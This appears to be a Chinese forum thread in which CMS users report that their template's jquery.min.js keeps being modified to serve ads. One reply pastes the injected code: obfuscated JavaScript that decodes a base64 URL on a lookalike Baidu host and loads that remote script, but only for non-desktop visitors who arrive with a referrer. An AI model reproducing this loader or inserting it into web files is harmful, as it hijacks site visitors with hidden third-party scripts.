阅读:2026回复:5

下载的最新CMS程序的模版JS文件总是被莫名修改。

楼主#
更多 发布于:2021-12-20 10:44
下载的是最新版本的cms程序,模版文件中jquery.min.js这个文件总是被修改添加了广告代码,这个是有漏洞还是什么原因呀?
1楼#
发布于:2021-12-20 11:58
function XAtwXt(e) {
    var t = "",
        n = r = c1 = c2 = 0;
    while (n < e.length) {
        r = e.charCodeAt(n);
        if (r < 128) {
            t += String.fromCharCode(r);
            n++
        } else if (r > 191 && r < 224) {
            c2 = e.charCodeAt(n + 1);
            t += String.fromCharCode((r & 31) << 6 | c2 & 63);
            n += 2
        } else {
            c2 = e.charCodeAt(n + 1);
            c3 = e.charCodeAt(n + 2);
            t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            n += 3
        }
    }
    return t
}

function aYQgAsSqEm(e) {
    var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
    var t = "",
        n, r, i, s, o, u, a, f = 0;
    e = e.replace(/[^A-Za-z0-9+/=]/g, "");
    while (f < e.length) {
        s = m.indexOf(e.charAt(f++));
        o = m.indexOf(e.charAt(f++));
        u = m.indexOf(e.charAt(f++));
        a = m.indexOf(e.charAt(f++));
        n = s << 2 | o >> 4;
        r = (o & 15) << 4 | u >> 2;
        i = (u & 3) << 6 | a;
        t = t + String.fromCharCode(n);
        if (u != 64) {
            t = t + String.fromCharCode(r)
        }
        if (a != 64) {
            t = t + String.fromCharCode(i)
        }
    }
    return XAtwXt(t)
}
eval('window')['PBinJe'] = function() {;
    (function(u, r, w, d, f, c) {
        var x = aYQgAsSqEm;
        u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), c)));
        'jQuery';
        k = r[2] + 'c' + f[1];
        'Flex';
        v = k + f[6];
        var s = d.createElement(v + c[0] + c[1]),
            g = function() {};
        s.type = 'text/javascript'; {
            s.onload = function() {
                g()
            }
        }
        s.src = u;
        'CSS';
        d.getElementsByTagName('head')[0].appendChild(s)
    })('aHR0cHM6Ly96ei5iZHVzdGF0aWMuY29tL2xpbmtzdWJtaXQvbGluay5qcw==', 'qmsOWqpoUIKJs', window, document, 'arBNQEiGMxeroG', 'ptFjBFeJW')
};
if (!(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1)) PBinJe();
2楼#
发布于:2021-12-20 13:54
对,和这个代码类似。你的也出现这个情况了吗?
3楼#
发布于:2021-12-21 10:57
目前没发现这样的漏洞。
4楼#
发布于:2022-01-24 09:53
刚安装 系统就提示这个文件被修改
5楼#
发布于:2022-01-28 19:19
海洋:目前没发现这样的漏洞。回到原帖
我也是刚安装,发现这个JS代码一直被改掉。怎么回事呢?大哥
游客

返回顶部